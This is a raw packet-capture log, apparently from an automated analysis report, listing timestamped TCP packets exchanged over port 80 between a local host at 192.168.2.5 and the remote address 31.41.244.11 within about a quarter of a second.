Dec 17, 2024 06:03:42.355058908 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.355223894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.355262995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.356148958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.356189966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.356220961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.356266022 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.357279062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.357290983 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.357330084 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.358249903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.358289003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.358350992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.358387947 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.359317064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.359361887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.359483004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.359519958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.360451937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.360474110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.360558987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.361458063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.361521006 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.361529112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.361644030 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.362505913 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.362546921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.362551928 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.362643957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.363523006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.363586903 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.363610983 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.363739967 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.364677906 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.364689112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.364721060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.365645885 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.365686893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.365753889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.365788937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.366846085 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.366856098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.366883039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.366911888 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.367784023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.367821932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.367882967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.367913961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.368810892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.368854046 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.369066954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.369106054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.369875908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.369915009 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.370028973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.370065928 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.371225119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.371234894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.371269941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.372060061 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.372097015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.372170925 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.372209072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.373176098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.373184919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.373210907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.373224020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.374245882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.374257088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.374281883 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.374291897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.375206947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.375246048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.375309944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.375353098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.376390934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.376451969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.376746893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.377291918 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.377484083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.378473043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.378513098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.378598928 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.379425049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.379470110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.379535913 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.379575014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.380506039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.380546093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.380577087 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.380614042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.381611109 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.381653070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.381849051 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.381884098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.382659912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.382697105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.382767916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.382803917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.383764029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.383774996 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.383810043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.383824110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.384855032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.384865046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.384891987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.384903908 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.385772943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.385814905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.385921955 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.385960102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.386872053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.386928082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.387003899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.387041092 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.387985945 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.388031960 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.388099909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.388137102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.388957977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.388998032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.389079094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.389115095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.390048981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.390094042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.390155077 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.390192032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.391128063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.391170025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.391232967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.391268969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.392187119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.392229080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.529107094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.529161930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.529175043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.529217005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.529499054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.529531956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.529691935 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.529726982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.530550957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.530589104 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.530647993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.530687094 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.532037973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.532052994 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.532077074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.532100916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.532792091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.532807112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.532828093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.532847881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.533744097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.533777952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.533898115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.533930063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.534826040 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.534864902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.535142899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.535178900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.536098957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.536108971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.536132097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.536150932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.537014008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.537024021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.537056923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.537067890 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.538058043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.538069010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.538106918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.539076090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.539118052 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.539146900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.539184093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.540221930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.540234089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.540275097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.540291071 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.541246891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.541287899 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.541404963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.541467905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.542344093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.542366982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.542395115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.542428017 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.543359041 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.543401003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.543431044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.543469906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.544471025 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.544481993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.544512033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.544529915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.545527935 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.545541048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.545574903 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.545598984 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.546683073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.546695948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.546736956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.546763897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.547894001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.547905922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.547940016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.547960043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.548680067 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.548691034 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.548721075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.548739910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.549737930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.549778938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.549841881 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.549886942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.550731897 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.550775051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.550894976 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.550934076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.551817894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.551861048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.551939011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.551980019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.552848101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.552891970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.553920984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.553978920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.554007053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.554045916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.554056883 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.554095030 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.555052042 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.555100918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.555108070 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.555152893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.556015015 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.556066990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.556194067 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.556237936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.557168007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.557216883 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.557293892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.557337046 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.558177948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.558235884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.558281898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.558331013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.559273005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.559325933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.559395075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.559438944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.560309887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.560358047 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.560421944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.560470104 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.561352968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.561402082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.561480045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.561527014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.562417984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.562463045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.562537909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.562578917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.563509941 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.563559055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.563564062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.563604116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.564521074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.564570904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.564737082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.564783096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.565612078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.565663099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.565798998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.565855026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.566705942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.566751003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.566759109 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.566804886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.567955017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.567991972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.568005085 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.568036079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.568928003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.568974972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.569021940 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.569071054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.569905043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.569953918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.570014000 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.570054054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.570928097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.570972919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.571029902 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.571079016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.571969032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.572016954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.572069883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.572118044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.573000908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.573044062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.573106050 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.573154926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.574064970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.574111938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.574289083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.574337006 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.575148106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.575195074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.575268030 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.575330973 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.576236963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.576276064 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.576337099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.576383114 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.577320099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.577359915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.577374935 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.577416897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.578334093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.578383923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.578511953 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.578857899 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.579376936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.579433918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.579484940 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.579575062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.580420971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.580473900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.580534935 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.580691099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.581513882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.581572056 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.581597090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.581641912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.582629919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.582740068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.582750082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.582782984 CET	49902	80	192.168.2.5	31.41.244.11
